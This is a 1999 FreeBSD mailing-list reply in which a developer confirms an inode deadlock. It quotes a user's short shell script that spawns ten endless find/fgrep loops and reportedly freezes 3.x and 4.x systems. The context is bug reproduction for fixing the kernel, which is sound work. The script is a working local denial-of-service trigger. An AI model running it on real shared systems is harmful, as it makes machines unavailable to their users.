Date:      Thu, 4 Mar 1999 16:35:14 -0800 (PST)
From:      Matthew Dillon <dillon@apollo.backplane.com>
To:        Chris Costello <chris@holly.dyndns.org>, Mike Tancsa <mike@sentex.net>, current@FreeBSD.ORG
Subject:   Re: Simple DOS against 3.x locks box solid

    Well, this was easy to duplicate.  I'll try to track it down.  It seems
    to occur under -4.x as well as -3.x.  Definitely an inode deadlock of some
    kind.

					-Matt

:    Try changing the 'find' to 'find -x'.  If this still locks up the machine
:    we will have to then determine whether it occurs under 4.x as well, or
:    if it only occurs under 3.x.
:					-Matt
:
::> As posted by yk@dgtu.donetsk.ua
::> >
::> >This script freeze my 3.1-RELEASE box.
::> >I can't make any connection with my box, also from console.
::> >
::> >-------- cut here ---
::> >#! /bin/sh
::> >
::> >for j in 1 2 3 4 5 6 7 8 9 10
::> >do
::> >echo -n $j
::> >nohup sh -c 'while :; do find / -type file |xargs fgrep fticom; done'
::> >/dev/null 2>&1 &
::> >echo
::> >done
::> >
::> >--
::> >Yury V. Yaroshevsky     | Donetsk State Technical University
::> >YY18-RIPE    		| (380 622) 356455  yk@dgtu.donetsk.ua